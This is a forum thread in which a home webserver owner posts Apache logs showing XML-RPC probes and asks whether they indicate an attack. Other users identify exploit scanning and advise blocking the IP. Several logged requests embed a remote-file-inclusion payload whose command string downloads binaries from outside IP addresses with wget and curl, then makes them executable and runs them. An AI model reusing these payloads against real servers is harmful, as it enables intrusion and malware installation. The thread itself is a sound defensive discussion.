My WebServer Logs - Is this an attack?

Hi, I found wome weird entries on my webserver access logs.  My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic dns to locate it.  It is basically just used by friends and family in other states to view pictures of my new baby son.

I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.

NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested.  It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).

I'd appreciate any advice on what you think the logs indicate...  Is this an attack or something innocent?

I'm running apache2.


218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

LVL 23
basicinstinctAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

jss1199Commented:
Hi basicinstinct,

You hit the nail on the head....They are fishing for to exploit xml-rpc for php vulnerability

http://isc.sans.org/diary.php?storyid=823


Cheers!
0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
jhanceCommented:
It's not a problem, however.  Note that all the responses are "404".  That means what was sought was not found.  If this were my server I'd simply put a block on this IP address to prevent further attempts.  You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
0
basicinstinctAuthor Commented:
Thanks for the response - the link to isc.sans.org from jss is very informative.  Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief.  I will indeed block this IP - good idea.

I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.  

Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.

Either way, I intend to contact this website and ask the to PLEASE EXPLAIN.  I will also write to the ISP.  It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought.  Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them.  I'm upset, but I'll stop raving now.

0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Security

From novice to tech pro — start learning today.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.